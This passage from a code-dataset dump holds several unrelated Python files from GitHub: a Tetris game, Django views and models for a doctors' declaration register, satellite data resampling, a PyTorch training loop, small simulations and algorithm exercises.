range(Board.BoardWidth):\n self.drawSquare(painter,\n rect.left() + j * self.squareWidth(),\n boardTop + i * self.squareHeight())\n\n def drawSquare(self, painter, x, y):\n color = QColor(200, 0, 0)\n painter.fillRect(x + 1, y + 1, self.squareWidth() - 2,\n self.squareHeight() - 2, color)\n\n\ndef main():\n app = 
QApplication(sys.argv)\n ex = Tetris()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"genakoganovich/Tetris","sub_path":"tetris_from_scratch/015_tetris.py","file_name":"015_tetris.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19115119297","text":"\"\"\"detector URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import include, url\nimport views\n\nurlpatterns = [\n url(r'^$', views.MainView.as_view(), name='main'),\n url(r'^get_prev_photo$', 'lightsite.views.get_prev_photo_from_ajax', name=\"get_prev_photo\"),\n url(r'^search_logo$', 'lightsite.views.search_logo_from_ajax', name=\"search_logo\"),\n url(r'^check_image$', 'lightsite.views.check_image_from_ajax', name=\"check_image\"),\n url(r'^save_logo$', 'lightsite.views.save_logo_from_ajax', name=\"save_logo\"),\n url(r'^remove_logo$', 'lightsite.views.remove_logo_from_ajax', name=\"remove_logo\"),\n url(r'^remove_company', 'lightsite.views.remove_company_from_ajax', name=\"remove_company\"),\n url(r'^save_stat', 'lightsite.views.save_stat_from_ajax', name=\"save_stat\"),\n url(r'^company/edit/(?P\\d+)$', views.CompanyEditView.as_view(),\n name='company-edit', ),\n url(r'^company/new$', views.CompanyNewView.as_view(),\n name='company-new', ),\n url(r'^company/(?P\\d+)$', views.CompanyView.as_view(),\n name='company-view', ),\n url(r'^companies$', views.ListCompanyView.as_view(),\n name='company-list', ),\n url(r'^statistic', views.ListStatisticView.as_view(),\n name='statistic-list', ),\n url(r'^admin/statistic', views.ListAdminStatisticView.as_view(),\n name='admin-statistic-list', ),\n url(r'^denied', views.DeniedView.as_view(),\n name='denied', ),\n\n # url(r'^new$', views.CreatePhotoView.as_view(),\n # name='userphoto-new', ),\n # url(r'^list$', views.ListPhotoView.as_view(),\n # name='userphoto-list', ),\n # url(r'^search(?P\\d+)$', views.SearchView.as_view(), name='search-done'),\n # url(r'^search$', views.SearchView.as_view(), name='search'),\n # url(r'^search((?:/(?P\\d+))|(?:/))?$', 'lightsite.views.init_search',\n # name='search'),\n # url(r'^load$', views.load,\n # name='load'),\n]\n","repo_name":"abryazgin/detector","sub_path":"lightsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31531188204","text":"# Author: Hanzi Mao \n#\n# License: BSD 3 clause\n\nfrom .utils import get_lat_lon_bins\nfrom ..utils import get_out_path\n\nimport os\nimport numpy as np\nimport numpy.ma as ma\nfrom netCDF4 import Dataset\nfrom datetime import datetime\n\n\ndef modis_lst_upsample(doy_start, doy_end):\n in_path = os.path.join(\"Data\", \"MOD11A1\", \"500m\")\n out_path = get_out_path(os.path.join(\"Data\", \"MOD11A1\", \"3km\"))\n\n date_start = datetime.strptime(doy_start, \"%Y%m%d\").date()\n date_end = 
datetime.strptime(doy_end, \"%Y%m%d\").date()\n\n lats, lons, lat_bins, lon_bins = get_lat_lon_bins(\"M03\", 50, 24, -125, -66)\n\n for nc_file in os.listdir(in_path):\n if nc_file.endswith('.nc'):\n nc_date = datetime.strptime(nc_file[:-3], \"%Y%m%d\").date()\n if date_start <= nc_date <= date_end:\n print(nc_file)\n fh = Dataset(os.path.join(in_path, nc_file), 'r')\n fh_out = Dataset(os.path.join(out_path, nc_file), 'w')\n\n dic_var = {}\n for var in ['lat', 'lon']:\n dic_var[var] = fh.variables[var]\n dic_var['lat_value'] = dic_var['lat'][::-1]\n dic_var['lon_value'] = dic_var['lon'][:]\n\n fh_out.createDimension('lat', len(lats))\n fh_out.createDimension('lon', len(lons))\n\n for var in ['lat', 'lon']:\n outVar = fh_out.createVariable(var, 'f4', (var,))\n outVar.setncatts({k: dic_var[var].getncattr(k) for k in dic_var[var].ncattrs()})\n outVar[:] = lats if var == \"lat\" else lons\n\n for var in ['LST_Day_1km', 'LST_Night_1km']:\n fill_value = 0.0\n dic_var[var] = fh.variables[var]\n dic_var[var + '_value'] = dic_var[var][:]\n dic_var[var + '_resampled'] = np.full((len(lats), len(lons)), fill_value)\n for id_lats in range(len(lats)):\n for id_lons in range(len(lons)):\n lats_index = np.searchsorted(dic_var['lat_value'],\n [lat_bins[id_lats + 1], lat_bins[id_lats]])\n lons_index = np.searchsorted(dic_var['lon_value'],\n [lon_bins[id_lons], lon_bins[id_lons + 1]])\n if lats_index[0] != lats_index[1] and lons_index[0] != lons_index[1]:\n selected = dic_var[var + '_value'][np.array(range(-lats_index[1], -lats_index[0]))[:, None],\n np.array(range(lons_index[0], lons_index[1]))]\n avg = ma.mean(selected)\n dic_var[var + '_resampled'][id_lats, id_lons] = (avg if avg is not ma.masked else fill_value)\n\n v_name = \"_\".join(var.split(\"_\")[:-1]) if var in [\"LST_Day_1km\", \"LST_Night_1km\"] else var\n outVar = fh_out.createVariable(v_name, \"f4\", ('lat', 'lon',))\n outVar.setncatts({'units': 'K'})\n outVar.setncatts({'_FillValue': np.array([0]).astype('f4')})\n outVar.setncatts({'valid_min': np.array([7500]).astype('f4')})\n outVar.setncatts({'valid_max': np.array([65535]).astype('f4')})\n outVar.setncatts({k: dic_var[var].getncattr(k) for k in dic_var[var].ncattrs()\n if k not in ['_FillValue', 'valid_min', 'valid_max']})\n outVar[:] = dic_var[var + '_resampled'][:]\n # outVar[:] = ma.masked_less(outVar, 150)\n\n fh.close()\n fh_out.close()\n\n","repo_name":"HannaMao/Gap-Filling-of-Soil-Moisture","sub_path":"data_preprocessing/rescaling/modis_lst.py","file_name":"modis_lst.py","file_ext":"py","file_size_in_byte":3792,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"18406799263","text":"# coding=utf-8\n# This is a sample Python script.\n\n# Press ⌃R to execute it or replace it with your code.\n# Press Double ⇧ to search everywhere for classes, files, tool windows, actions, and settings.\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urlencode\nfrom urllib.request import urlopen, Request\nimport json\nimport ssl\nimport numpy as np\nimport torch\nimport torch as nn\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\n\n\n\ndef python_start(name):\n N, D_in, H, D_out = 64, 1000, 100, 10\n x = torch.randn(N, D_in)\n y = torch.randn(N, D_out)\n\n #w1 = torch.randn(D_in, H, requires_grad = True)\n #w2 = torch.randn(H, D_out,requires_grad = True)\n\n model = torch.nn.Sequential(\n torch.nn.Linear(D_in,H),\n torch.nn.ReLU(),\n torch.nn.Linear(H,D_out),\n )\n\n class 
TwoLayerNet(torch.nn.Module):\n def __init__(self,D_in,H,D_out):\n super(TwoLayerNet,self).__init__() \n self.linear1 = torch.nn.Linear(D_in,H,bias = False)\n self.linear2 = torch.nn.Linear(H,D_out,bias = False)\n def forward(self,x):\n y_pred = self.linear2(self.linear1(x).clamp(min=0))\n return y_pred\n model = TwoLayerNet(D_in,H,D_out)\n \n\n #torch.nn.init.normal(model[0].weight)\n #torch.nn.init.normal(model[2].weight)\n\n loss_fn = torch.nn.MSELoss(reduction='sum')\n learning_rate = 1e-4\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n for it in range(500):\n y_pred = model(x)\n #h = x.mm(w1)\n #h_relu = h.clamp(min = 0) #np.maximum(h,0)\n #y_pred = h_relu.mm(w2)\n\n #loss = np.square(y_pred - y).sum()\n #loss = (y_pred - y).pow(2).sum()\n loss = loss_fn(y_pred,y)\n print(it, loss.item())\n\n #model.zero_grad()\n # grad_y_pred = 2.0 * (y_pred - y)\n #grad_w2 = h_relu.t().mm(grad_y_pred)\n #grad_h_relu = grad_y_pred.mm(w2.t())\n #grad_h = grad_h_relu.clone()\n #grad_h[h<0] = 0\n #grad_w1 = x.t().mm(grad_h)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n #with torch.no_grad():\n \n #w1 -= learning_rate * w1.grad\n #w2 -= learning_rate * w2.grad\n #w1.grad.zero_()\n #w2.grad.zero_()\n\n #for param in model.parameters():\n # param -= learning_rate * param.grad\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n python_start('PyCharm')\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"x5gg/nnn","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70046889388","text":"import stocks\n\nprint(\"Welcome to the climate change and finance simulator game!\")\n\nprint(\"Here is a list of the stocks available to invest in.\")\nlist_unique_stocks = []\n\nfor stock in stocks.stocks_chart:\n if ((stock['symbol'] in list_unique_stocks) == False):\n list_unique_stocks.append(stock['symbol'])\nprint(list_unique_stocks)\n\nbalance = int(input(\"What is your current balance?\\n\"))\nsymbol = input(\"What is the symbol of the stock that you would like to buy?\\n\")\nprice = 0\n\nyear = input(\"During which of the years (1990, 2000, 2007) would you like to invest in this stock?\\n\")\n\nfor stock in stocks.stocks_chart:\n if (symbol == stock['symbol']) and (year == stock['year']):\n price = stock['price']\n\nshares_all = balance // price\nprint(\"You are able to buy \" + str(shares_all) + \" shares of stocks \" + symbol + \" with your current balance.\")\nchoice = int(input(\"What would you like to do? \\n1. Buy all \" + str(shares_all) + \" shares\\n2. Buy some shares\\n3. Buy none\\n\" ))\nsell_price = 0\n\nif choice == 1:\n sell_year = input(\"At what year would you like to sell the stocks? (2000, 2007, 2019)\\n\")\n for stock in stocks.stocks_chart:\n if (sell_year == stock['year']) and (symbol == stock['symbol']):\n sell_price = stock['price']\n profit = (sell_price - price) * shares_all\n balance += profit\nelif choice == 2:\n shares = int(input(\"How many shares would you like to buy?\\n\"))\n if shares < shares_all:\n sell_year = input(\"At what year would you like to sell the stocks? 
(2000, 2007, 2019)\\n\")\n    for stock in stocks.stocks_chart:\n        if (sell_year == stock['year']) and (symbol == stock['symbol']):\n            sell_price = stock['price']\n    profit = (sell_price - price) * shares_all\n    balance += profit\nelif choice == 2:\n    shares = int(input(\"How many shares would you like to buy?\\n\"))\n    if shares < shares_all:\n        sell_year = input(\"At what year would you like to sell the stocks? (2000, 2007, 2019)\\n\")\n        for stock in stocks.stocks_chart:\n            if (sell_year == stock['year']) and (symbol == stock['symbol']):\n                sell_price = stock['price']\n        profit = (sell_price - price) * shares\n        balance += profit\n    else:\n        print(\"Please enter a valid number of shares under \" + str(shares_all))\nelif choice == 3:\n    print(\"Thank you. Please come back and find out more about stocks in the future.\")\n    \nprint(\"Your current balance is \" + str(balance) + \" dollars.\")","repo_name":"CynthiaWu10969/SimulatorProject","sub_path":"mvp.py","file_name":"mvp.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"13997372848","text":"from datetime import datetime\nfrom typing import NoReturn\n\nfrom graia.ariadne.event.message import MessageEvent, GroupMessage\nfrom graia.broadcast.builtin.decorators import Depend\n\nfrom library.orm import orm\nfrom library.orm.table import FunctionCallRecord\n\n\nclass FunctionCall:\n    @classmethod\n    def record(cls, pack: str) -> Depend:\n        \"\"\"\n        Record function call.\n\n        :param pack: Package name.\n        :return: Depend decorator.\n        \"\"\"\n\n        async def function_call_record(event: MessageEvent) -> NoReturn:\n            await cls.add_record(\n                pack=pack,\n                field=event.sender.group.id if isinstance(event, GroupMessage) else 0,\n                supplicant=event.sender.id,\n            )\n\n        return Depend(function_call_record)\n\n    @staticmethod\n    async def add_record(pack: str, field: int, supplicant: int) -> NoReturn:\n        \"\"\"\n        Add function call record.\n\n        :param pack: Package name.\n        :param field: Field.\n        :param supplicant: Supplicant.\n        :return: NoReturn.\n        \"\"\"\n\n        await orm.add(\n            FunctionCallRecord,\n            {\n                \"time\": datetime.now(),\n                \"field\": field,\n                \"supplicant\": supplicant,\n                \"function\": pack,\n            },\n        )\n","repo_name":"ProjectNu11/Null","sub_path":"library/depend/function_call.py","file_name":"function_call.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"}
+{"seq_id":"31969577575","text":"# Definition for singly-linked list.\nclass ListNode(object):\n    def __init__(self, val=0, next=None):\n        self.val = val\n        self.next = next\n\nclass LinkList(object):\n    def __init__(self):\n        # First initialize the head node as None\n        self.head = None\n\n    # Linked-list initialization function, works like tail insertion\n    def initList(self, data):\n        # Create the head node\n        # Once created, this node holds two parts: the node value and the link to the next node\n        self.head = ListNode(data[0])\n\n        # Initialize p to point at the head node\n        p = self.head\n        # Create a node for each item in data to build the list\n        for i in data[1:]:\n            node = ListNode(i)\n            p.next = node\n            # After building a node, move to it and keep building toward the tail\n            p = p.next\n\nclass Solution(object):\n    def mergeKLists(self, lists):\n        \"\"\"\n        :type lists: List[ListNode]\n        :rtype: ListNode\n        \"\"\"\n        if not lists:\n            return []\n        if len(lists)==1:\n            return lists[0]\n        dummy_head = self.mergeTwoList(lists[0], lists[1])\n        for i in range(2, len(lists)):\n            dummy_head = self.mergeTwoList(dummy_head, lists[i])\n        return dummy_head\n    \n    def mergeTwoList(self, list1, list2):\n        dummy_head = ListNode(None)\n        cur = dummy_head\n        while list1 and list2:\n            while list1 and list2 and list1.val<=list2.val:\n                cur.next = list1\n                cur = cur.next\n                list1 = list1.next\n            while list1 and list2 and list1.val>list2.val:\n                cur.next = list2\n                cur = cur.next\n                list2 = list2.next\n        if list1:\n            cur.next = list1\n        if list2:\n            cur.next = list2\n        return dummy_head.next\n    \n\nl1 = LinkList()\nl2 = LinkList()\nl3 = LinkList()\nl1.initList([1,4,5])\nl2.initList([1,3,4])\nl3.initList([2,6])\n\nsolution = 
Solution()\nsolution.mergeKLists([l1.head, l2.head, l3.head])\n ","repo_name":"wangshuo6699/codetop","sub_path":"algorithm/19.mergeKLists.py","file_name":"19.mergeKLists.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25084110937","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 10 11:37:12 2020\n\n@author: mak\n\"\"\"\n\n#%%\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom HH import HH\nfrom Analyze_Function import analyze\n\n#%% Run example HH, for 0.5 s, and 10 trials (SLOW).\nA_tonic = 10\nA_sin = 5\nA_noise = 2\nT = 0.5\nK = 10\n[V,spike_train,I,t] = HH(A_tonic, A_sin, A_noise, T, K)\n\n#%% # Example plots of voltage for two trials.\nplt.plot(t,V[0,:], 'r')\nispikes = np.where(spike_train[0,:]==1)\nplt.plot(t[ispikes],np.transpose(spike_train[0,ispikes]),'ko')\nplt.plot(t,I[0,:], 'b')\n\n#%% # Analyze the results\nresults = analyze(V,spike_train, I, t, plots=True)\n\n#%% # Additional plots\nplt.plot(results['faxis'],results['Snn'])\nplt.xlim([0,200]);","repo_name":"Mark-Kramer/BU-MA665-MA666","sub_path":"Final-Project/Final_Project_Analysis.py","file_name":"Final_Project_Analysis.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"37"} +{"seq_id":"17144188738","text":"import random\nfrom copy import deepcopy\nfrom typing import Dict, List\n\nimport numpy as np\n\nfrom app.core.environment.cluster.cluster_properties import (\n AgentsCommunicationProperties,\n)\n\n\nclass AgentCommunicationBuilder:\n \"\"\"\n Builds a communication graph between agents. The communication graph determines the agents with whom a\n particular agent can communicate during the simulation. 
There are four communication modes implemented:\n - neighbours: agents can communicate with their closest neighbours in a circular fashion.\n - closed_groups: agents are grouped into sets, each set containing a maximum of max_nb_agents_communication\n agents, and agents can communicate only with agents within the same set.\n - random_fixed: agents are connected to a fixed number of other agents, drawn randomly with replacement\n from the entire set of agents.\n - neighbours_2D: agents can communicate with their neighbours in a 2D grid.\n\n\n Attributes:\n agents_comm_props: AgentsCommunicationProperties\n The properties of the agents' communication.\n nb_comm: int\n The maximum number of agents that each agent can communicate with.\n nb_agents: int\n The total number of agents.\n agent_ids: List[int]\n The list of IDs of all agents.\n\n \"\"\"\n\n def __init__(\n self,\n agents_comm_props: AgentsCommunicationProperties,\n nb_agents: int,\n ) -> None:\n \"\"\"\n Initialize an instance of the AgentCommunicationBuilder class.\n\n Parameters:\n - agents_comm_props: An instance of the AgentsCommunicationProperties class which stores the properties of the communication between agents.\n - nb_agents: The number of agents in the simulation.\n \"\"\"\n self.agents_comm_props = agents_comm_props\n self.nb_comm = np.minimum(\n agents_comm_props.max_nb_agents_communication,\n (nb_agents - 1),\n )\n self.nb_agents = nb_agents\n self.agent_ids = list(range(nb_agents))\n\n def get_comm_link_list(self) -> Dict[int, List[int]]:\n \"\"\"\n Return a dictionary with the IDs of agents as keys and a list of IDs of agents with which they can communicate as values.\n \"\"\"\n mode = getattr(self, self.agents_comm_props.mode)\n return mode()\n\n def neighbours(self) -> Dict[int, List[int]]:\n \"\"\"\n Get the neighbours of each agent in a circular fashion,\n if agent_id is 5:\n the half before will be [0, 1, 2, 3, 4]\n and half after will be [6, 7, 8, 9, 10]\n if agent_id is 1:\n the half before will be [7, 8, 9, 10, 0]\n and half after will be [2, 3, 4, 5, 6]\n \"\"\"\n agent_communicators: Dict[int, List[int]] = {}\n for agent_id in self.agent_ids:\n half_before = [\n (agent_id - int(np.floor(self.nb_comm / 2)) + i) % len(self.agent_ids)\n for i in range(int(np.floor(self.nb_comm / 2)))\n ]\n half_after = [\n (agent_id + 1 + i) % len(self.agent_ids)\n for i in range(int(np.ceil(self.nb_comm / 2)))\n ]\n ids_houses_messages = half_before + half_after\n agent_communicators[agent_id] = ids_houses_messages\n return agent_communicators\n\n def closed_groups(self) -> Dict[int, List[int]]:\n \"\"\"\n Return a dictionary with the IDs of agents as keys and a list of IDs of agents with which they can communicate within the same group.\n Agents are grouped into sets, each containing a maximum of max_nb_agents_communication agents.\n \"\"\"\n agent_communicators: Dict[int, List[int]] = {}\n\n for agent_id in self.agent_ids:\n base = agent_id - (agent_id % (self.nb_comm + 1))\n if base + self.nb_comm <= len(self.agent_ids):\n ids_houses_messages = [\n base + i\n for i in range(\n self.agents_comm_props.max_nb_agents_communication + 1\n )\n ]\n else:\n ids_houses_messages = [\n len(self.agent_ids) - self.nb_comm - 1 + i\n for i in range(self.nb_comm + 1)\n ]\n ids_houses_messages.remove(agent_id)\n agent_communicators[agent_id] = ids_houses_messages\n return agent_communicators\n\n def random_sample(self) -> Dict[int, List[int]]:\n \"\"\"\n This method is intended to return a dictionary with the IDs of agents as keys and a 
list of IDs of\n randomly selected agents with which they can communicate.\n \"\"\"\n return {}\n\n def random_fixed(self) -> Dict[int, List[int]]:\n \"\"\"\n Returns a dictionary with the IDs of agents as keys and a list of IDs of randomly selected agents with which\n they can communicate. Each agent is connected to a fixed number of other agents,\n drawn randomly with replacement from the entire set of agents.\n \"\"\"\n agent_communicators: Dict[int, List[int]] = {}\n for agent_id in self.agent_ids:\n agent_communicators[agent_id] = self.get_random_sample(agent_id)\n return agent_communicators\n\n def neighbours_2D(self) -> Dict[int, List[int]]:\n \"\"\"\n Returns a dictionary with the IDs of agents as keys and a list of IDs of neighbouring agents with which they can communicate in a 2D grid.\n The communication distance is limited by the max_communication_distance parameter and the row size is specified by the row_size parameter.\n \"\"\"\n if len(self.agent_ids) % self.agents_comm_props.row_size != 0:\n # TODO: put this in validator of model\n raise ValueError(\"Neighbours 2D row_size must be a divisor of nb_agents\")\n\n max_y = len(self.agent_ids) // self.agents_comm_props.row_size\n if (\n self.agents_comm_props.max_communication_distance\n >= (self.agents_comm_props.row_size + 1) // 2\n or self.agents_comm_props.max_communication_distance >= (max_y + 1) // 2\n ):\n # TODO: put this in validator of model\n raise ValueError(\n \"Neighbours 2D distance_comm ({}) must be strictly smaller than (row_size+1) / 2 ({}) and (max_y+1) / 2 ({})\".format(\n self.agents_comm_props.max_communication_distance,\n (self.agents_comm_props.row_size + 1) // 2,\n (max_y + 1) // 2,\n )\n )\n\n distance_pattern = []\n for x_diff in range(\n -1 * self.agents_comm_props.max_communication_distance,\n self.agents_comm_props.max_communication_distance + 1,\n ):\n for y_diff in range(\n -1 * self.agents_comm_props.max_communication_distance,\n self.agents_comm_props.max_communication_distance + 1,\n ):\n if abs(x_diff) + abs(\n y_diff\n ) <= self.agents_comm_props.max_communication_distance and (\n x_diff != 0 or y_diff != 0\n ):\n distance_pattern.append((x_diff, y_diff))\n agent_communicators: Dict[int, List[int]] = {}\n\n for agent_id in self.agent_ids:\n x = agent_id % self.agents_comm_props.row_size\n y = agent_id // self.agents_comm_props.row_size\n ids_houses_messages = []\n for pair_diff in distance_pattern:\n x_new = x + pair_diff[0]\n y_new = y + pair_diff[1]\n if x_new < 0:\n x_new += self.agents_comm_props.row_size\n if x_new >= self.agents_comm_props.row_size:\n x_new -= self.agents_comm_props.row_size\n if y_new < 0:\n y_new += max_y\n if y_new >= max_y:\n y_new -= max_y\n agent_id_new = y_new * self.agents_comm_props.row_size + x_new\n ids_houses_messages.append(agent_id_new)\n agent_communicators[agent_id] = ids_houses_messages\n return agent_communicators\n\n def get_random_sample(self, agent_id) -> List[int]:\n \"\"\"\n Returns a list of `nb_comm` randomly selected agent IDs, excluding the given `agent_id`.\n\n Parameters:\n agent_id (int): The ID of the agent to exclude from the possible IDs that can be selected.\n\n Returns:\n List[int]: A list of `nb_comm` randomly selected agent IDs, excluding the given `agent_id`.\n \"\"\"\n possible_ids = deepcopy(self.agent_ids)\n possible_ids.remove(agent_id)\n return random.sample(possible_ids, 
k=self.nb_comm)\n","repo_name":"ALLabMTL/marl-demandresponse","sub_path":"server/app/core/environment/cluster/agent_communication_builder.py","file_name":"agent_communication_builder.py","file_ext":"py","file_size_in_byte":8827,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"1315168787","text":"import pygame\r\nfrom math import sqrt, sin, pi, atan, cos\r\nfrom random import randrange\r\n\r\npygame.init()\r\nscreen = pygame.display.set_mode((600, 600))\r\nw, h = screen.get_width(), screen.get_height()\r\nmirror = 6\r\nangle = pi / 3\r\nmin_range = -4\r\nmax_range = -min_range + 1\r\nsolid = [[w / 2, h / 2]]\r\n\r\n\r\ndef distance(x, y, x1, y1):\r\n return sqrt((x - x1) ** 2 + (y - y1) ** 2)\r\n\r\n\r\nstart_y = h / 2\r\n\r\n\r\ndef special_add(x, y):\r\n y1 = -(h / 2 - y)\r\n # prototype = [[x, y1], [x, y]]\r\n angle1 = atan(y / x)\r\n angle2 = atan(y1 / x)\r\n length = distance(x, y, w / 2, h / 2)\r\n\r\n for i in range(mirror):\r\n solid.append([length * cos(i * angle + angle1) + w / 2, length * sin(i * angle + angle1) + start_y])\r\n solid.append([length * cos(i * angle + angle2) + w / 2, length * sin(i * angle + angle2) + start_y])\r\n\r\n\r\nclass snowflake:\r\n def __init__(self, x_=w, y_=start_y, st=False):\r\n self.x = x_\r\n self.y = y_\r\n self.vx = -0.1\r\n self.stuck = st\r\n self.radius = 2\r\n\r\n def move(self):\r\n self.x -= 1\r\n self.y += randrange(min_range, max_range)\r\n max_a = h / 2 - (self.x - w / 2) * sin(angle / 2)\r\n if self.y > h / 2:\r\n self.y = h / 2\r\n elif self.y < max_a:\r\n self.y = max_a\r\n\r\n def show(self):\r\n pygame.draw.circle(screen, (255, 255, 255), (self.x, self.y), self.radius)\r\n\r\n def collision(self, others):\r\n if not self.stuck:\r\n for v in others:\r\n if v is not self and v.stuck:\r\n if distance(self.x, self.y, v.x, v.y) <= self.radius + v.radius:\r\n self.stuck = True\r\n return self.x, self.y\r\n return None, None\r\n\r\n\r\ncrystal = [snowflake(w / 2, h / 2, True)]\r\ncounter = 0\r\n\r\nwhile True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n break\r\n screen.fill((0, 0, 0))\r\n\r\n for c in crystal:\r\n px, py = c.collision(crystal)\r\n if not c.stuck:\r\n c.move()\r\n else:\r\n c.show()\r\n if px is not None:\r\n special_add(px, py)\r\n\r\n\r\n for s in solid:\r\n pygame.draw.circle(screen, (255, 255, 255), (s[0], s[1]), 2)\r\n\r\n if counter % 100 == 0 and counter < 40000:\r\n crystal.append(snowflake())\r\n counter += 1\r\n pygame.display.update()\r\n","repo_name":"Sierpinski22/Python-Projects","sub_path":"Simulazioni/Brownian_snowflake/B_snowflake.py","file_name":"B_snowflake.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7823793350","text":"# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution(object):\n l = []\n def inorderSuccessor(self, root, p):\n self.help(root)\n if p not in self.l:\n return False\n if self.l.index(p) == len(self.l) - 1:\n return False\n return self.l[self.l.index(p) + 1]\n \"\"\"\n :type root: TreeNode\n :type p: TreeNode\n :rtype: TreeNode\n \"\"\"\n def help(self, node):\n if node == None:\n return\n self.help(node.left)\n self.l.append(node.val)\n self.help(node.right)\n","repo_name":"YihaoGuo2018/leetcode_Python","sub_path":"Inorder Successor in BST.py","file_name":"Inorder 
Successor in BST.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9862318292","text":"from unittest.mock import Mock\n\n\nclass InfraFacadeMock(Mock):\n def __init__(self):\n super(InfraFacadeMock, self).__init__()\n self.io_factory = Mock()\n self.server = Mock()\n self.player = Mock()\n self.media_factory = Mock()\n self.service_factory = Mock()\n","repo_name":"Tastyep/Pi-OpenCast","sub_path":"test/shared/infra/facade_mock.py","file_name":"facade_mock.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"37"} +{"seq_id":"11993121188","text":"\"\"\"\nModels for Sunshine UK.\n\"\"\"\nimport datetime as dt\nimport hashlib\nimport random\n\nfrom django.conf import settings\nfrom django.urls import reverse, reverse_lazy\nfrom django.db import models\nfrom django.utils import timezone\n\nfrom doctors import send_mail\n\n\nclass Doctor(models.Model):\n name = models.CharField(max_length=200)\n gmc_number = models.CharField(max_length=100, unique=True, verbose_name=\"GMC Number\")\n job_title = models.CharField(max_length=200)\n primary_employer = models.CharField(max_length=200)\n employment_address = models.TextField()\n email = models.EmailField(blank=True, null=True)\n\n def __str__(self):\n return f'{self.name} - {self.gmc_number}'\n\n def get_absolute_url(self):\n return reverse('doctor-detail', kwargs={'pk': self.pk})\n\n def to_dict(self):\n return dict(\n name=self.name,\n gmc_number=self.gmc_number,\n job_title=self.job_title,\n primary_employer=self.primary_employer,\n employment_address=self.employment_address,\n declarations=[d.to_dict() for d in self.declaration_set.all()]\n )\n\n def send_declaration_thanks(self):\n \"\"\"\n Send this doctor an email thanking them for their declaration,\n explaining that if this is their first submission it will not\n turn up for 24 hours, and with a link.\n \"\"\"\n if settings.DEBUG:\n print(\"=\" * 20)\n print(\"email sent\")\n print(\"=\" * 20)\n else:\n send_mail.send_mail(\n to_emails=[self.email],\n subject=\"Sunshine UK - Thanks for your declaration\",\n template=\"email/declaration_thanks.html\",\n template_context={\n \"settings\": settings,\n \"doctor\": self,\n \"register\": reverse('doctor-list')\n }\n )\n return\n\n def get_archived_declarations(self):\n return self.declaration_set.all().order_by('-date_created')\n\n\nclass Declaration(models.Model):\n doctor = models.ForeignKey(Doctor, on_delete=models.CASCADE)\n interests = models.BooleanField(default=False)\n past_declarations = models.TextField(blank=True, null=True)\n other_declarations = models.TextField(blank=True, null=True)\n date_created = models.DateField(default=dt.date.today)\n dt_created = models.DateTimeField(default=dt.datetime.now)\n\n def __str__(self):\n return f'{self.doctor} - {self.date_created}'\n\n def to_dict(self):\n return dict(\n date=self.date_created.strftime('%Y-%m-%dT%H:%M:%S'),\n past_declarations=self.past_declarations,\n other_declarations=self.other_declarations,\n benefits=dict(\n pharma=[b.to_dict() for b in self.pharmabenefit_set.all()],\n othermedical=[b.to_dict() for b in self.othermedicalbenefit_set.all()],\n fee=[b.to_dict() for b in self.feebenefit_set.all()],\n grant=[b.to_dict() for b in self.grantbenefit_set.all()]\n )\n )\n\n @property\n def nothing_to_declare(self):\n the_things = (self.pharmabenefit_set.count() == 0,\n 
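The inorder-successor record above takes the O(n) route: it flattens the whole tree into a class-level list `l` and searches it, so the list persists across `Solution` instances and the lookup compares node values against a `p` that the docstring says is a `TreeNode`. For contrast, here is a sketch of the standard O(h) walk that needs no stored traversal (assuming an ordinary BST with unique values):

def inorder_successor(root, p):
    """Return the in-order successor node of p in a BST, or None.

    Each step discards half the remaining tree, so this runs in O(h)
    time and O(1) extra space instead of materialising the traversal.
    """
    successor = None
    node = root
    while node:
        if p.val < node.val:
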